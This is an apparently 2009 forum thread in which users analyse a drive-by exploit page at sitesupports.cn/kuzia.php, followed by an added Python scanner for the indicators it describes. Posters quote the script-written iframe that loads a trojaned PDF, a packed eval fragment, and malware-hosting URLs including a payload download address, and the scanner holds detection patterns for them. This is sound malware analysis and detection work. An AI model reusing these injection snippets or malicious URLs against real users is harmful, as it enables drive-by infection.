·Frontier FiberOp..
|
Threat Detected: sitesupports.cn.kuzia.php a.php |
While browsing darkroastedblend(dot)com a friend of mine received a "threat detected" warning from "Web Shield". The inserted picture shows what he saw. I could find no information regarding "kuzia" or any details regarding the alleged JavaScript obfuscation. Does anyone know anything about what this is? Thanks, Ender |
|
Snowy (Lock him up!!!) Premium Member join:2003-04-05 Kailua, HI
2009-Apr-5 6:34 pm
I can't answer your question directly but in light of this similar thread » Website owned? Or false positive? can anyone say if this sort of thing could be mitigated by placing the entire .cn domain in the host file? |
|
·Frontier FiberOp..
|
Thanks for the response. That was quite an interesting thread.
No doubt editing the hosts file would prevent any unwanted offsite image fills from *.cn or the execution of offsite scripts, but in this case the sitesupports(dot)cn website appears to be an "Apache HTTP Server Test Page" which seems unremarkable and without scripts of any kind. The only embedded links are to apache(dot)org and centos(dot)org and one informational link to internic(dot)net. Seems weird that his "Web Shield" protection freaked out over that.
In viewing the source I could not find anything embedded on the darkroastedblend site that looked threatening, but I am certainly not a security expert. Then again, I don't browse with IE or with javascript enabled or with active x enabled...
:O) |
|
|
Ender3rd |
to Snowy
said by Snowy: can anyone say if this sort of thing could be mitigated by placing the entire .cn domain in the host file?
I looked into your idea of blocking a top level domain with the hosts file and found that the hosts file will not accept wildcards. From what I read, it can be handled at the DNS level, but I could find no easy method for dealing with this as an end user. Does anyone have any suggestions? I would not miss .cn at all if I could block it here. |
|
VikingBobGo Jets Go! Premium Member join:2004-06-05 MB Canada |
OpenDNS will block TLDs. You have to sign up, though. In the settings, add ".cn" (without quotes) in the domains to block list. No * for a wildcard needed. |
|
3 edits |
to Ender3rd
sitesupports.cn certainly does contain exploit code. The root URL may be a default placeholder page, but the URL AVG complained about (/kuzia.php) does try to launch a trojaned PDF: document.write('<iframe src="cache/readme.pdf"></iframe>');
(It also attempts to load a Flash file, but that's not present on the server, currently.) I couldn't find any link to this attack on darkroastedblend.com. Either it's been fixed for now, or it doesn't always show up, or the compromise was in a random advert shown by one of the site's ad networks. As for blocking .cn, it may help as a temporary measure if you're sure you'll never need to look at any Chinese sites. It's far from watertight of course; in particular many of the current round of Chinese sploits are being referenced by direct IP address instead of hostname. |
|
mysec Premium Member join:2005-11-29 1 edit 1 recommendation
2009-Apr-6 7:10 pm
Very interesting site to study. Different things happen depending on the browser. Using IE6 unpatched on Win2K, several exploits attempt to run, including MS06-014 (MDAC):
Kaspersky identifies load.exe as Trojan.Win32.Inject.rlh. Also MS08-041 (Snapshot Viewer) but I don't have MSAccess installed, so the exploit attempts to find my Office Setup Disk and use an installer (msi*.tmp):
Note that these are old exploits already patched, yet must still be effective or they wouldn't continue to be used. Some of the obfuscated page code. The first 'setAttribute' is for the MS06-014 exploit, and the 'snapshot' code is below.
That code did not load when I accessed the page using Opera. According to some analysts, garbling the code makes it more difficult for AV to identify the page as malware code. The PDF file exploit would not execute on my old version 6 of Acrobat Reader. The file is identified by Sophos as Troj/PDFJs-L, Type: Trojan. Another "feature" of this site is the evasive techniques used to avoid multiple connections to the site by the same IP address. The second time I connected brought up a blank page with this code:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <HTML><HEAD>
    <META http-equiv=Content-Type content="text/html;
    charset=windows-1251"></HEAD>
    <BODY></BODY></HTML>
This technique was analyzed a couple of years ago in this article: Report Reveals New Genre of Evasive Attacks » www.finjan.com/Pressrele ··· 30&lan=3 In order to minimize the malicious code's window of exposure, evasive attacks keep track of the actual IP addresses of visitors to a particular website or web page. Using this information, the attackers restrict exposure to the malicious code to a single view from each unique IP address. This means that the second time a given IP address tries to access the malicious page, a benign page will be automatically displayed in its place. All traces of the initial malicious page completely disappear.
"Evasive attack techniques where malicious code is controlled per IP address, country of origin or number of visits provide hackers with the ability to minimize the malicious codes exposure, thereby reducing the likelihood of detection. Moreover, evasive attacks can identify the IP addresses of crawlers used by URL filtering, reputation services and search engines, replying to these engines with legitimate content and increasing the chances of mistakenly being classified by them as a legitimate category," said Yuval Ben-Itzhak, CTO, Finjan. "The combination of these evasive attacks with code obfuscation techniques significantly enhances the capability of sophisticated hackers to go undetected."
Hacking for Dollar$ - The Financial Affiliations Behind Modern Website Attacks
Driven by strong financial incentives and using widely available malicious code software packages, "affiliations" are being created that promote infections using a "hosted" model for the malicious code. This applies to the current exploit: In this scheme, the malicious code is usually located on a dedicated malicious code server (or a site that has been hacked to host the malicious code), [sitesupports.cn.kuzia]
while the participants in the affiliation insert a reference to the malicious code in various websites. [darkroastedblend.com] [my insertions] The website owners are paid according to the number of infected visitors to the site. Finjan's findings attest to the growing magnitude of these affiliation networks, which have been used to compromise highly popular websites and even government domains. This was written in 2007. Not much has changed! EDIT: correct a statement ---- rich |
|
therube join:2004-11-11 Randallstown, MD 4 edits |
to Snowy
Similar indeed. Look what Metabolic posted: quote: Hi, today I met with this page and I suggest there are two files. One uses an Adobe Acrobat Reader bug to install malware to the computer, the other is a Flash virus. This is the pdf: hxxp://liteautorepair.cn/cache/readme.pdf This is the swf: hxxp://liteautorepair.cn/cache/flash.swf
The page checks which plugin is installed ...
Different domains doing the hosting, but the same (named) payload. (At the least) readme.pdf from liteautorepair is still available. Contains JavaScript code. /JS (eval\(function\(p,a,c,k,e,d\){e=function\(c\){return\(c<a?'':e\(parseInt\(c/a\)\)\)+\(\(c=c%a\)>35?String.fromCharCode\(c+29\):c.toString\(36\)\)} ...
Points to MCRC Blog - 2009 - PACKED - The Elegant way to serve malware (which may have been linked in another thread here, or at least I remember the name finjan). (LOL. It was this thread that I read "finjan". Like mysec's post above.) (The kuzia pdf/swf files were not available to me. Either not there or being [IP?] blocked?) Also worth reviewing the first linked thread, including bobince's replies. Also good IMO that at least some A/Vs (AVG in the first instance) are pointing out potential problems with sites containing malware. |
|
|
to mysec
quote: "document.write" is not supported by non-IE browsers.
On the contrary, it's an original JavaScript 1.0 feature, going back to Netscape 2.0 days and supported everywhere. The page does use browser-sniffing (very common these days), but the version I got was targeted at other browsers via plugins. |
|
·Frontier FiberOp..
|
I appreciate all the information given in the thread. Would it be fair to say that [darkroastedblend] was a willing partner in this exploit, or is it more likely that they were the victim of an exploit that linked them to the sitesupports.cn scripts?
Also, when I view [sitesupports.cn] all I see is an "Apache 2 Test Page" that appears to be devoid of any script language in the source. I see no page at all if I append that with kuzia.php (viewing with firefox - scripts disabled) so is it fair to say that this particular exploit has been removed?
Thanks,
Ender |
|
|
mysec Premium Member join:2005-11-29 |
to bobince
Re: Threat Detected: sitesupports.cn.kuzia.php
said by bobince: quote: "document.write" is not supported by non-IE browsers.
On the contrary, it's an original JavaScript 1.0 feature, going back to Netscape 2.0 days and supported everywhere.
Thanks for the correction. I noticed my mistake last evening in another thread when I got the download using Opera, and intended to correct it here, which I just did. ---- rich |
|
mysec |
to Ender3rd
said by Ender3rd: I appreciate all the information given in the thread. Would it be fair to say that [darkroastedblend] was a willing partner in this exploit, or is it more likely that they were the victim of an exploit that linked them to the sitesupports.cn scripts?
Probably the latter, since bobince noted that the script has been removed.
said by Ender3rd: Also, when I view [sitesupports.cn] all I see is an "Apache 2 Test Page" that appears to be devoid of any script language in the source. I see no page at all if I append that with kuzia.php (viewing with firefox - scripts disabled) so is it fair to say that this particular exploit has been removed?
Remember to disconnect/reconnect between tries. The page with .../kuzia.php still loads here in both Opera and IE6, with differences in the code as I noted previously. ---- rich |
|
therube join:2004-11-11 Randallstown, MD |
to Ender3rd
quote: when I view [sitesupports.cn] all I see is an "Apache 2 Test Page"
Correct. 'Cause in all likelihood that is all that is there. Now if you were to use h-ttp://sitesupports.cn/kuzia.php/, you would see the exploit page (at least the start of it, & assuming your IP hasn't been blocked). Wonder if view-source: (in Mozilla browsers) would avoid the IP block? view-source:http://sitesupports.cn/kuzia.php/
|
|
mvdu Premium Member join:2003-07-28 Collegeville, PA |
to Ender3rd
I just get a blank page when I go there now, with AntiVir not alerting. Only the first time I went to hxxp://sitesupports.cn/kuzia.php/ did I get the exploit page that AntiVir alerted on. |
|
|
to mysec
Thanks again for the patient analysis. This was the first time I have seen a disappearing exploit after an initial page load. Very clever and evasive indeed.
Regards,
Ender |
|
|
Marrach Anon
2009-Apr-7 11:57 pm
to Ender3rd
Just a little extra info-- for Firefox 2x users-- You may find that Firefox may have had a configuration file rewritten by this website/trojan. I only noticed it after my Kaspersky woke up and blocked the download attempt of the actual Trojan, but Firefox had already been hijacked to attempt the download when it restarted. By then, Kaspersky blocked it-- but the browser kept trying to download. So when I tried to close Firefox, I got a window asking if I wanted to "Cancel a Download"-- but I never saw the download window in the first place, and when I opened the Download window it was empty-- Firefox was trying to download the file-- and had been instructed NOT to let you see it. You've got to get rid of a file in the Configuration that instructs Firefox to tap into sitesupports.cn when you start it up. I got rid of it by overwriting the Application Data files for Mozilla in "Documents and Settings". Sorry I don't know which one it was. I just overwrote from my last Clean Ghost. I don't know if the same thing can happen with Firefox 3x. That's my 2 cents. |
|
mysec Premium Member join:2005-11-29 |
to therube
said by therube: Similar indeed. Look what Metabolic posted: quote: This is the pdf: hxxp://liteautorepair.cn/cache/readme.pdf
Different domains doing the hosting, but the same (named) payload.
But the PDF files are different: sitesupports.cn MD5: 334a732f5d026b20eb24b860b3723833 FileSize: 9k Sophos: Troj/PDFJs-L Opening in Acrobat Reader:
liteautorepair.cn MD5: d085506ba97322a0896580eb5a7beefb FileSize: 16k BitDefender: Exploit.PDF-JS.Gen Opening in Acrobat Reader:
The PDF-JS trojans have been around awhile. Here is an analysis of an early one: Analyzing a malicious pdf - Troj/PDFJs-A » realsecurity.wordpress.c ··· pdfjs-a/ Now that we have the shellcode we can very easily find out what it's doing. We now have a .exe as output. hxxp://aolpound.com/z9QCkGo7/exe.php I don't know which versions and which vulnerabilities in the Acrobat Reader these PDF files exploit, but I did not get an alert to a download, as I did from the IE exploits as shown in a previous post. Nonetheless, I've never believed that an application should be depended upon to be a defense against malware executables, and that some type of execution prevention should be in place just in case. Is your browser configured to open documents on the web in the browser? This can present a problem with remote code execution exploits, such as this. I posted these screenshots in another thread, but they are applicable here. If configured to open in the browser, as I have with IE6, the PDF file will load into the i-frame and run. This code is still active. No click required: document.write('<iframe src="cache/readme.pdf"></iframe>');
In Opera I configure to prompt for a download:
In my view, this is the way that documents on the web should be treated. This way, the user is alerted if encountering something she/he didn't go looking for, rather than getting an automatic download.
---- rich
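The thread's indicators (a script-written iframe pulling readme.pdf, a PDF carrying a /JS action, and the eval(function(p,a,c,k,e,d)) packer header in its JavaScript) can be turned into a small triage scanner for saved page or PDF captures. This is an added example, not code from any poster; the sample HTML and PDF bytes are constructed here, not captured from the sites discussed.

```python
import re

# Constructed samples, not captures from sitesupports.cn or liteautorepair.cn.
SAMPLE_HTML = b"""<html><body><script>
document.write('<iframe src="cache/readme.pdf"></iframe>');
</script></body></html>"""

# Minimal PDF skeleton: an OpenAction that runs a packer-style JavaScript payload.
SAMPLE_PDF = (
    b"%PDF-1.4\n1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
    b"2 0 obj << /S /JavaScript /JS (eval(function(p,a,c,k,e,d){e=function(c){return c}})) >> endobj\n"
    b"%%EOF"
)

BENIGN_HTML = b"<html><body><p>Apache HTTP Server Test Page</p></body></html>"

# Indicator patterns taken from what the thread describes.
INDICATORS = {
    "script_written_iframe": re.compile(rb"document\.write\s*\(\s*['\"]\s*<iframe", re.I),
    "iframe_loads_document": re.compile(rb"<iframe[^>]+src=['\"][^'\"]+\.(?:pdf|swf)['\"]", re.I),
    "pdf_javascript_action": re.compile(rb"/(?:JS|JavaScript)\b"),
    "pdf_open_action": re.compile(rb"/OpenAction\b"),
    "packer_eval_header": re.compile(rb"eval\(function\(p,a,c,k,e,d\)"),
}


def scan(data: bytes) -> dict:
    """Map each indicator name to the 0-based byte offsets where it matched."""
    hits = {}
    for name, pattern in INDICATORS.items():
        offsets = [m.start() for m in pattern.finditer(data)]
        if offsets:
            hits[name] = offsets
    return hits


def verdict(data: bytes) -> str:
    """Coarse triage label: packed JS, or JS that fires on open, is the strongest signal."""
    hits = scan(data)
    if not hits:
        return "clean"
    auto_run_js = "pdf_javascript_action" in hits and "pdf_open_action" in hits
    if "packer_eval_header" in hits or auto_run_js:
        return "likely-malicious"
    return "suspicious"


if __name__ == "__main__":
    for label, blob in (("html", SAMPLE_HTML), ("pdf", SAMPLE_PDF), ("benign", BENIGN_HTML)):
        print(label, verdict(blob), sorted(scan(blob)))
```

Pattern matching of this kind is a triage aid only; a benign page with a PDF in an iframe scores "suspicious", so the matched offsets are there to direct a manual look at the surrounding bytes.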